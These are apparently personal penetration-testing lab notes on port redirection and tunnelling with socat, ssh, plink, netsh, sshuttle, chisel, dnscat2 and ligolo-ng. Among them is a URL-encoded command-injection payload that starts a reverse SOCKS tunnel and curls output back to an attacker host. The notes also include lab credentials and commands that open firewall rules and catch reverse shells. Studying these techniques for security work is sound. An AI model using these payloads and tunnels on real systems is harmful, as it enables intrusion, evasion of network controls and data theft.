Port redirection && Tunnel

Port Redirection

netcat

socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22

• TCP-LISTEN set listen tcp port
• fork when receive a tcp,fork a new process,not die
• TCP:10.4.50.215:22 set redirection target
• -ddd set verbose output,debug

ssh.exe(windows)

the version of openssh>=7.6

ssh -N -R 9998 kali@192.168.118.4

also edit conf of proxychains and use proxychains

plink.exe(windows)

C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4

• -l set user
• -pw set passwd
• -R listen_socket:forward_socket first 127.0.0.1 mean the ssh target loop address,second 127.0.0.1 mean the local machine loop address
  or

  cmd.exe /c echo y | .\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.41.7

  and we could connect to the machine port

  xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:127.0.0.1:9833

  netsh(windows)

  it need administrator privilege
  use netsh interface to add a portproxy rule

  netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215

• v4tov4 ipv4
• listenport listenaddress set listen socket
• connectport connectaddress set forward socket

  netsh interface portproxy show all

  check the port forward if stored
  but the firewalld still ban the port
  use netsh advfirewall firewall to add rule

  netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow

• name= set rule name
• protocol allow TCP protocol
• dir set direction
• localip localport action allow use tcp protocol to connect in localip and localport,especially for inbound

Tunnel

Tunnel wrap a protocol in another data stream when transport
no firewalld

normal user only listen port>1024!!!

ssh tunnel

if u dont have pty shell,spawn a pty by python

python3 -c 'import pty; pty.spawn("/bin/bash")'

ssh local port forward

|   |   |   |
A   B   C   D
A B contact
B C contact
C D contact

B make a ssh tunnel to C and the ssh tunnel will forward data to D

ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215

• -N no shell,ban excute any command
• -L set local port forward
  • IPADDRESS:PORT:IPADDRESS:PORT first socket was the set the listen socket as the ssh client, second socket was the target that we will forward data
• -v if there was error,use -v to debug

ssh dynamic port forward

forward dynamic port

ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215

• -D set dynamic port forward.set we want to bind socket.ip:port

and we need change proxychains file

tail /etc/proxychains4.conf
#       proxy types: http, socks4, socks5, raw
#         * raw: The traffic is simply forwarded to the proxy without modification.
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 192.168.50.63 9999#the ip that start dynamic port forward

we can excute nmap scan.
nmap scan

proxychains nmap -vvv -sT -p 4800-4900 -Pn 172.16.226.217 -n
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-23 12:23 CST
Initiating Connect Scan at 12:23
Scanning 172.16.226.217 [101 ports]
[proxychains] Strict chain  ...  192.168.226.63:9999  ...  172.16.226.217:4858 <--socket error or timeout!
[proxychains] Strict chain  ...  192.168.226.63:9999  ...  172.16.226.217:4897 <--socket error or timeout!
adjust_timeouts2: packet supposedly had rtt of 15589634 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 15589634 microseconds.  Ignoring time.
Connect Scan Timing: About 1.98% done; ETC: 12:49 (0:25:35 remaining)
[proxychains] Strict chain  ...  192.168.226.63:9999  ...  172.16.226.217:4849 <--socket error or timeout!
adjust_timeouts2: packet supposedly had rtt of 15671333 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 15671333 microseconds.  Ignoring time.

• -vvv verbose output
• -n forbid dns analyze(important)
• -Pn forbid host discovery(important)

  sudo proxychains nmap -vvv -sS -p 4872 172.16.226.217 -n -Pn
  [proxychains] config file found: /etc/proxychains4.conf
  [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
  [proxychains] DLL init: proxychains-ng 4.16
  Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
  Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-23 12:40 CST
  Initiating SYN Stealth Scan at 12:40
  Scanning 172.16.226.217 [1 port]
  Completed SYN Stealth Scan at 12:40, 2.02s elapsed (1 total ports)
  Nmap scan report for 172.16.226.217
  Host is up, received user-set.
  Scanned at 2024-01-23 12:40:42 CST for 2s
  
  PORT     STATE    SERVICE REASON
  4872/tcp filtered unknown no-response
  
  Read data files from: /usr/bin/../share/nmap
  Nmap done: 1 IP address (1 host up) scanned in 2.09 seconds
             Raw packets sent: 2 (88B) | Rcvd: 0 (0B)

  if u cant connect the host directly,-Pn and -n was necessary
  SYN scan sometime will have some defect. it’s better to spend more time to excute TCP scan

just always remember that when you use a SOCK5 proxy, ping and stealth scans will NEVER go through the tunnel. It is just how it works. You’ll need to do full TCP scans with nmap to get results.
SOCKS doens’t support ping/UDP in most methods but there are strange edge cases but typically there is no protocol support for it

ssh remote port forward

if the firewalld stop any local port listen,we could use remote port forward

ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 rightevil@192.168.118.4

• -R set remote port forward.listen_socket:forward_socket.the listen set the socket u listen. the forward set the forward target.

u can connect the target port by u local port

psql -h 127.0.0.1 -p 2345 -U postgres

ssh dynamic remote port forward

remote port + dynamic port forward

ssh -N -R 9998 kali@192.168.118.4

listen_socket.if u dont set the ip,the default was 127.0.0.1
u need to edit the conf file of proxychains

kali@kali:~$ tail /etc/proxychains4.conf
#       proxy types: http, socks4, socks5, raw
#         * raw: The traffic is simply forwarded to the proxy without modification.
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9998

dynamic port forward need use proxychains
eg:

proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.50.64

sshuttle tunnel

sshuttle like a VPN,it need the root of ssh client,python3 of ssh server
if we connect to a machine by ssh. we are ssh client,he was the ssh server
the machine need to start port forward

socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22

and we strat a ssh tunnel by sshuttle to the target subnet

sshuttle -r database_admin@192.168.50.63:2222 10.4.50.0/24 172.16.50.0/24

set the string of ssh socket
final we could connect to the target directly

smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234

http tunnel

if Deep Packet Inspection forbid all packet except http(we could use wget and curl)

chisel

sockes
make sure the version match
reverse port forward(like ssh remote port forward)
start chisel server in our machine

chisel server --port 8080 --reverse

if excute command by curl
payload

/tmp/chisel client 192.168.45.153:8080 R:socks > /dev/null 2>&1 &

• server socket
• R:socks reverse socks tunnel(default port 1080)
• > /dev/null 2>&1 & other shell redirect to null,and it will excute background,our command injection would’nt wait for process finish

debug
payload in curl

/tmp/chisel client 192.168.118.4:8080 R:socks &> /tmp/output; curl --data @/tmp/output http://192.168.118.4:8080/

read /tmp/output and return to our 8080

curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.118.4:8080%20R:socks%20%26%3E%20/tmp/output%20%3B%20curl%20--data%20@/tmp/output%20http://192.168.118.4:8080/%27%29.start%28%29%22%29%7D/

if connect successfully

kali@kali:~$ chisel server --port 8080 --reverse
2023/10/03 15:57:53 server: Reverse tunnelling enabled
2023/10/03 15:57:53 server: Fingerprint Pru+AFGOUxnEXyK1Z14RMqeiTaCdmX6j4zsa9S2Lx7c=
2023/10/03 15:57:53 server: Listening on http://0.0.0.0:8080
2023/10/03 18:13:54 server: session#2: Client version (1.8.1) differs from server version (1.8.1-0kali2)
2023/10/03 18:13:54 server: session#2: tun: proxy#R:127.0.0.1:1080=>socks: Listening

we could use proxychains or ncat in ssh
ssh

ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215

• %h %p for the host and port
  or

  proxychains command

  nmap scan

  sudo proxychains nmap -vvv -sT -Pn --top-ports 100 10.4.213.64

  dns tunnel

  dnscat2

  dnscat2 server will excute in a special domain in our machine,client will excute in the zombine machine
  server

  kali@felineauthority:~$ dnscat2-server feline.corp
  [sudo] password for kali: 
  
  New window created: 0
  New window created: crypto-debug
  Welcome to dnscat2! Some documentation may be out of date.
  
  auto_attach => false
  history_size (for new windows) => 1000
  Security policy changed: All connections must be encrypted
  New window created: dns1
  Starting Dnscat2 DNS server on 0.0.0.0:53
  [domains = feline.corp]...
  
  Assuming you have an authoritative DNS server, you can run
  the client anywhere with the following (--secret is optional):
  
    ./dnscat --secret=7a87a5d0a8480b080896606df6b63944 feline.corp
  
  To talk directly to the server without a domain name, run:
  
    ./dnscat --dns server=x.x.x.x,port=53 --secret=7a87a5d0a8480b080896606df6b63944
  
  Of course, you have to figure out <server> yourself! Clients
  will connect directly on UDP port 53.
  
  dnscat2> New window created: 1
  Session 1 security: ENCRYPTED BUT *NOT* VALIDATED
  For added security, please ensure the client displays the same string:
  
  >> Annoy Mona Spiced Outran Stump Visas
  
  dnscat2>

  client

  database_admin@pgdatabase01:~/dnscat$ ./dnscat feline.corp
  Creating DNS driver:
   domain = feline.corp
   host   = 0.0.0.0
   port   = 53
   type   = TXT,CNAME,MX
   server = 127.0.0.53
  
  Encrypted session established! For added security, please verify the server also displays this string:
  
  Annoy Mona Spiced Outran Stump Visas 
  
  Session established!

  dnscat

  #list all active windows
  windows
  #user windows 1
  window -i 1
  #listen like ssh local listen
  listen 127.0.0.1:4455 172.16.2.11:445

  local socket remote socket
  i think use local ip not loop ip will better

recommended tools

ligolo-ng

It’s convenient when pivot network and excute nmap scan.And it could receive reverse shell and download file by webserver from kali.
first init:

sudo ip tuntap add user rightevil mode tun ligolo

sudo ip link set ligolo up

start in kali

./proxy -selfcert

agent connect
windows

.\agent.exe -connect 192.168.45.248:11601 -ignore-cert

linux

./agent -connect 192.168.45.153:11601 -ignore-cert

choose session

session

enum interface

ifconfig

add innet

sudo ip route add 172.16.216.0/24 dev ligolo

choose session and start tunnel connect

session

start

start scan directly

nmap -sn 172.16.1.0/24

set listener(capture reverse shell and transfer file)

listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443

listener_add --addr 0.0.0.0:81 --to 127.0.0.1:80

list listener

listener_list

chisel

!!!important!!!
the client and server version should be the same
it cant listen reverse shell in innet network!!!

Because of his niche, he is sometimes not discovered or blocked by firewalls etc.
but it spend more time when excute nmap scan,cause socks proxy just support TCP scan.and chisel cant receive reverse shell.

socks proxy

kali:

chisel server --port 8080 --reverse

target:
run in background

Start-Job -ScriptBlock { c:\my\chisel.exe client 192.168.45.223:8080 R:socks }

/tmp/chisel client 192.168.45.153:8080 R:socks > /dev/null 2>&1 &

just run

c:\my\chisel.exe client 192.168.45.223:8080 R:socks

/tmp/chisel client 192.168.45.153:8080 R:socks

then use proxy to excute command to communicate with innet network

port forward

revserse mode: share remote:port from client to server’s local:port
strict mode: share remote:port from server to client’s local:port
Backward joins are more common than forward joins. Because the firewall will prevent us from actively connecting to the target
server:

chisel server --port 8080 --reverse

chisel.exe server --port 8080 --reverse

client:

/tmp/chisel client 192.168.45.153:8080 R:8000:127.0.0.1:8000 

.\chisel.exe client 192.168.45.153:8080 R:8000:127.0.0.1:8000

run in background

/tmp/chisel client 192.168.45.153:8080 R:8000:127.0.0.1:8000 &

Start-Job -ScriptBlock { .\chisel.exe client 192.168.45.153:8080 R:8000:127.0.0.1:8000 }

more than one port

/tmp/chisel client 192.168.45.153:51234 R:8000:127.0.0.1:8000 R:8443:127.0.01:8443

# "R" is shorthand for "127.0.0.1"
# Effectively, listen on 127.0.0.1 on attack box

just add the remote_socket